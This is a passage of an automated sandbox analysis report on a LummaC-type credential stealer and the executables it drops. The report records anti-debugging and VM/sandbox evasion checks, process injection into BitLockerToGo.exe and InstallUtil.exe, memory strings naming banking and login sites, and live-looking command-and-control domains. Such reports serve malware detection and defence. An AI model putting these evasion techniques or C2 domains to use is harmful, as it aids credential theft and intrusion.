Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594203
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 594092
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Thread delayed: delay time: 593969
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe, 0000001E.00000002.4119232499.0000599C006E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: i8Vwc7iOaG.exe, 00000000.00000003.2154970848.0000000005A54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: i8Vwc7iOaG.exe, i8Vwc7iOaG.exe, 00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226965505.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348956952.0000000001264000.00000004.00000020.00020000.00000000.sdmp, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.4677077995.0000000000967000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.4677077995.0000000000939000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: vmware
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: i8Vwc7iOaG.exe, 00000000.00000003.2154970848.0000000005A54000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: 4XVI62Q28CHMU2Y2V4F8.exe, 00000005.00000003.2557250040.0000000001536000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\K
Source: soonmaintain.exe, 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: soonmaintain.exe, 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: t0IHakP.exe, 0000001D.00000002.5042818994.0000000005BCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssC:\Windows\system32\svchost.exe
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Y71AV1VIPLT8Y663WBDXSB.exe, Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3144434711.0000000001015000.00000040.00000001.01000000.00000006.sdmp, 4XVI62Q28CHMU2Y2V4F8.exe, 00000005.00000002.2590747009.0000000000B79000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2618557327.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2633584360.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000B.00000002.4796091646.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, FIJECAEHJJ.exe, 00000013.00000002.3166301819.00000000009A9000.00000040.00000001.01000000.0000000F.sdmp, 5fe60d6c80.exe, 00000015.00000002.3287999191.0000000001160000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 00000016.00000002.3321039831.0000000001020000.00000040.00000001.01000000.00000013.sdmp, axplong.exe, 00000017.00000002.3321504397.0000000001020000.00000040.00000001.01000000.00000013.sdmp, k0ukcEH.exe, 0000001B.00000002.3536002772.0000000000BAB000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 52ba7a538c.exe, 00000014.00000002.3404236894.00000000015FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: BitLockerToGo.exe, 0000001A.00000002.4622133707.0000000002B68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware6VE
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: t0IHakP.exe, 0000001D.00000002.4813359985.000000000329C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3147595579.0000000001294000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: i8Vwc7iOaG.exe, 00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483274596.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2226965505.0000000001258000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2483422066.0000000001262000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2130703360.0000000001264000.00000004.00000020.00020000.00000000.sdmp, i8Vwc7iOaG.exe, 00000000.00000003.2348956952.0000000001264000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWS
Source: t0IHakP.exe, 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp	Binary or memory string: VMwareVBox
Source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3144434711.0000000001015000.00000040.00000001.01000000.00000006.sdmp, 4XVI62Q28CHMU2Y2V4F8.exe, 00000005.00000002.2590747009.0000000000B79000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.2618557327.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2633584360.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000B.00000002.4796091646.0000000001039000.00000040.00000001.01000000.0000000A.sdmp, FIJECAEHJJ.exe, 00000013.00000002.3166301819.00000000009A9000.00000040.00000001.01000000.0000000F.sdmp, 5fe60d6c80.exe, 00000015.00000002.3287999191.0000000001160000.00000040.00000001.01000000.00000011.sdmp, axplong.exe, 00000016.00000002.3321039831.0000000001020000.00000040.00000001.01000000.00000013.sdmp, axplong.exe, 00000017.00000002.3321504397.0000000001020000.00000040.00000001.01000000.00000013.sdmp, k0ukcEH.exe, 0000001B.00000002.3536002772.0000000000BAB000.00000040.00000001.01000000.00000018.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: BitLockerToGo.exe, 0000001A.00000002.4649356341.0000000005C91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\i8Vwc7iOaG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\FIJECAEHJJ.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C60AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6C60AC62

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Code function: 3_2_6C60AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6C60AC62

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: Y71AV1VIPLT8Y663WBDXSB.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 52ba7a538c.exe PID: 6324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3176, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140000000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Memory written: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe	Memory written: C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: i8Vwc7iOaG.exe, 00000000.00000003.2082637596.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mindhandru.buzz
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: k0ukcEH.exe, 0000001B.00000003.3452788599.00000000051B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe

Thread register set: target process: 7652

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 913008
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 41F000
Source: C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 423000
